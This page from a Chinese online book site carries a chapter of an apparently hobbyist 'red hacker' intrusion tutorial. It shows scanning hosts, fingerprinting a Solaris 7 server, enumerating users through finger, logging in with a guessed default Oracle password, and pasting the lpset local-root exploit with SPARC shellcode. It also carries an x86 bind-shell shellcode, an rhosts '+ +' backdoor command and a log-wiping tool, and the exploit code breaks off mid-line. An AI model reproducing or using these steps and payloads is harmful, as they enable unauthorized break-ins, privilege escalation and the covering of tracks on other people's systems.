友情提示:如果本网页打开太慢或显示不完整,请尝试鼠标右键“刷新”本网页!
读书室 返回本书目录 加入书签 我的书架 我的书签 TXT全本下载 『收藏到我的浏览器』

30天打造专业红客-第19部分

快捷操作: 按键盘上方向键 ← 或 → 可快速上下翻页 按键盘上的 Enter 键可回到本书目录页 按键盘上方向键 ↑ 可回到本页顶部! 如果本书没有阅读完,想下次继续接着阅读,可使用上方 "收藏到我的浏览器" 功能 和 "加入书签" 功能!

    本机IP:127。0。0。1
    测试IP:127。0。0。17
    新程序说明:
    “lpset。c”是利用solaris 7和solaris 2。6的/usr/bin/lpset …a 缓冲区溢出漏洞所写的一个exploit。
    Solaris 7 lpset …a 缓冲区溢出漏洞 
    Solaris 2。6和Solaris 7中所带的lpset缺省设置了suid root位,它的一个执行选项〃…a〃在处
    理时存在问题,它会将提供给〃…a〃的参数不加判断的拷贝到一个固定大小的buffer(900多字节)
    中;当用户提供一个包含可执行代码的很长的字符串时,将导致lpset以root身份执行任意命令。
    尽管lpset缺省只允许root和sysadm组的用户执行,但是,由于溢出发生在进行执行权限判断操
    作之前,任意本地用户都可以利用这个漏洞获取root权限。
    wipe…1。00:unix和liunx下,一个非常好用的日志清除程序。
    新名词讲解:
    肉鸡:已经被攻击了,具有控制权的主机。
    跳板:利用此主机作跳板,攻击其他主机。
    shell:shell是系统与用户的交换式界面。简单来说,就是系统与用户的“沟通”环境。我们平时经常用到的DOS,就是一个shell。(Windows2000是cmd。exe)
    root:Unix里最高权限的用户。也就是超级管理员。
    admin:Windows NT里最高权限的用户。也就是超级管理员。
    rootshell:通过一个溢出程序,在主机溢出一个具有root权限的shell。
    exploit:溢出程序。exploit里通常包含一些shellcode。
    shellcode:溢出攻击要调用API函数,溢出后要有一个交换式界面进行操作。所以就有了shell的code。
    char shellcode'' = 〃x31xdbx31xc9x31xc0xb0x46xcdx80〃 〃x89xe5x31xd2xb2x66x89xd0x31xc9x89xcbx43x89x5dxf8〃 〃x43x89x5dxf4x4bx89x4dxfcx8dx4dxf4xcdx80x31xc9x89〃 〃x45xf4x43x66x89x5dxecx66xc7x45xeex0fx27x89x4dxf0〃 〃x8dx45xecx89x45xf8xc6x45xfcx10x89xd0x8dx4dxf4xcd〃 〃x80x89xd0x43x43xcdx80x89xd0x43xcdx80x89xc3x31xc9〃 〃xb2x3fx89xd0xcdx80x89xd0x41xcdx80xebx18x5ex89x75〃 〃x08x31xc0x88x46x07x89x45x0cxb0x0bx89xf3x8dx4dx08〃 〃x8dx55x0cxcdx80xe8xe3xffxffxff/bin/sh〃;
    这就是一个shellcode。
    找一个Unix主机也是一种技巧。
    1、首先,我们打开superscan。
    设置:
    IP:(需要扫描的IP地址。)
    Start:127。0。0。1
    Stop:127。0。0。255
    Scan Type:(扫描类型设置。)
    All ports from:23|23
    然后,点击“Start”,开始扫描。 
    2、点击“Prune”,把多余的主机删除。 
    3、点击“Expand All”,把所有扫描到的主机打开。这时,在端口下面就会显示一些信息。这些信息就是端口的响应。 
    小技巧: 
    。。。。。。。。#。。'。。:这种响应,通常是Sunos主机的。 
    。。。。。 。。#。。':这种响应,通常是liunx的。 
    假设,我们扫描到:127。0。0。17。 
    打开,Windows自带的“命令提示符”。
    ping 主机:
    主要目的是查看主机是否能连接。
    D:》ping 127。0。0。17
    Pinging 127。0。0。17 with 32 bytes of data:
    Reply from 127。0。0。17: bytes=32 time=191ms TTL=241
    Reply from 127。0。0。17: bytes=32 time=170ms TTL=241
    Reply from 127。0。0。17: bytes=32 time=160ms TTL=241
    Reply from 127。0。0。17: bytes=32 time=170ms TTL=241
    Ping statistics for 127。0。0。17:
     Packets: Sent = 4; Received = 4; Lost = 0 (0% loss);
    Approximate round trip times in milli…seconds:
     Minimum = 160ms; Maximum =  191ms; Average =  172ms
    小技巧:
    通常 TTL 》 200的,都是liunx或者unix系统。
    TTL 《 200的,都是Windows 9x或Windows NT系统。
    telnet主机:
    主要看看telnet的banner。
    D:》telnet 127。0。0。17
    SunOS 5。7
    login:
    solaris 7 的。
    接着,我用Superscan扫描主机的端口。
    方法:
    打开superscan。
    设置:
    IP:
    Start:127。0。0。17
    Stop:127。0。0。17
    Scan Type:(扫描类型设置。)
    All ports from:1|65535
    然后,点击“Start”,开始扫描。 
    扫描完毕后,点击“Expand All”,把所有扫描到的端口打开。 
    * + 211。99。25。1
    |___ 7 Echo
    |___ 9 Discard
    |___ 13 Daytime
    |___ 19 Character Generator
    |___ 21 File Transfer Protocol 'Control'
    |___ 23 Telnet
    |___ 25 Simple Mail Transfer
    |___ 37 Time
    |___ 53 Domain Name Server
    |___ 79 Finger
    |___ 111 SUN Remote Procedure Call
    |___ 512 remote process execution;
    |___ 513 remote login a la telnet;
    |___ 514 cmd
    |___ 515 spooler
    |___ 540 uucpd
    主要的端口有:21、25、53、79、111、513
    其他还有:22、80等
    端口的主要漏洞:
    21:FTP的端口。主要漏洞是ftpd。如果允许anonymous(匿名)用户,而且具有读写权限,那么那台机子就是你的啦。假如你具有读写权限的用户密码,那就更加容易了。
    22:ssh的端口。例如:SSH 3。0的远程登录漏洞等。
    25:sendmail的端口。利用它的漏洞,我们可以D。O。S主机。freebsd的8。8。3版本还可以远程溢出rootshell。
    53:DNS的端口。主要漏洞是bind。对于bind 8。2的DNS服务器,我们可以利用exploit溢出一个rootshell。
    79:finger的端口。在unix和liunx都很有作用。对于Sunos,我们可以 finger 0@***。***。***。*** 刺探用户。对于,liunx可以 finger @***。***。***。*** 刺探当前在线的用户。
    80:web的端口。这个端口就是我们平时浏览网站的默认端口。主要的漏洞有CGI漏洞。
    111:rpc的端口。rpc漏洞是当今最流行的漏洞之一。每一个漏洞都可以远程溢出rootshell。例如:redhat的rpc。statd,Solaris的rpc。ttdbserverd等。
    513:rlogin的端口。你可以向主机发送一条:echo '+ +' 》/。rhost 如果成功,就可以不用密码rlogin到主机。
    finger主机。
    目的是利用finger漏洞寻找主机的用户。(取得主机的用户对入侵主机有很大帮助。)
    D:》finger 0@127。0。0。17
    '127。0。0。17'
    Login NameTTYIdle When Where
    daemon ??? 《 。  。  。  。 》
    bin ??? 《 。  。  。  。 》
    sys ??? 《 。  。  。  。 》
    chenhy ???pts/7   61。158。255。225
    mdevice???897  61。140。253。142
    liuy???pts/5   211。101。132。50
    oracle ???console  6:57 Mon 14:29  :0
    oracle ???pts/24d Mon 14:29  :0。0
    oracle ???pts/522 Sat 16:34  61。140。253。142
    D:》
    存在finger漏洞。系统的用户显示出来了。(chenhy、mdevice、liuy、orcle)
    oracle,通常oracle的密码就是oracle。
    马上试一下!
    D:》telnet 127。0。0。17
    SunOS 5。7
    login: oracle
    Password:
    Last login: Sat Aug  4 17:25:49 from 61。140。253。142
    Sun Microsystems Inc。SunOS 5。7 Generic October 1998
    
    成功了!
    假如在这一步并没有猜到用户的密码,我们可以利用其他工具继续猜测。
     
    命令:uname …a
    查看主机的信息。 
    uname …a
    SunOS mars 5。7 Generic_106541…08 sun4u sparc SUNW;Ultra…5_10
    SunOS mars 5。7:SunOS的版本。
    sparc:服务器版本。
    Generic_106541…08:补丁情况。
     
    找到exploit:lpset。c
    cat 》lpst。c
    /*## copyright LAST STAGE OF DELIRIUM apr 2000 poland  *://lsd…pl/ #*/
    /*## /usr/bin/lpset #*/
    #define NOPNUM 864
    #define ADRNUM 132
    #define ALLIGN 3
    char shellcode''=
     〃x20xbfxffxff〃  /* bn;a   */
     〃x20xbfxffxff〃  /* bn;a  */
     〃x7fxffxffxff〃  /* call   */
     〃x90x03xe0x20〃  /* add  %o7;32;%o0  */
     〃x92x02x20x10〃  /* add  %o0;16;%o1  */
     〃xc0x22x20x08〃  /* st%g0;'%o0+8' */
     〃xd0x22x20x10〃  /* st%o0;'%o0+16'*/
     〃xc0x22x20x14〃  /* st%g0;'%o0+20'*/
     〃x82x10x20x0b〃  /* mov  0xb;%g1  */
     〃x91xd0x20x08〃  /* ta8  */
     〃/bin/ksh〃
    ;
    char jump''=
     〃x81xc3xe0x08〃  /* jmp  %o7+8 */
     〃x90x10x00x0e〃  /* mov  %sp;%o0  */
    ;
    static char nop''=〃x80x1cx40x11〃;
    main(int argc;char **argv){
     char buffer'10000';adr'4';*b;
     int i;
     printf(〃copyright LAST STAGE OF DELIRIUM apr 2000 poland  //lsd…pl/n〃);
     printf(〃/usr/bin/lpset for solaris 2。6 2。7 sparcnn〃);
     *((unsigned long*)adr)=(*(unsigned long(*)())jump)()+10088+400;
     b=buffer;
     sprintf(b;〃***=〃);
     b+=4;
     for(i=0;i
返回目录 上一页 下一页 回到顶部 1 1
快捷操作: 按键盘上方向键 ← 或 → 可快速上下翻页 按键盘上的 Enter 键可回到本书目录页 按键盘上方向键 ↑ 可回到本页顶部!
温馨提示: 温看小说的同时发表评论,说出自己的看法和其它小伙伴们分享也不错哦!发表书评还可以获得积分和经验奖励,认真写原创书评 被采纳为精评可以获得大量金币、积分和经验奖励哦!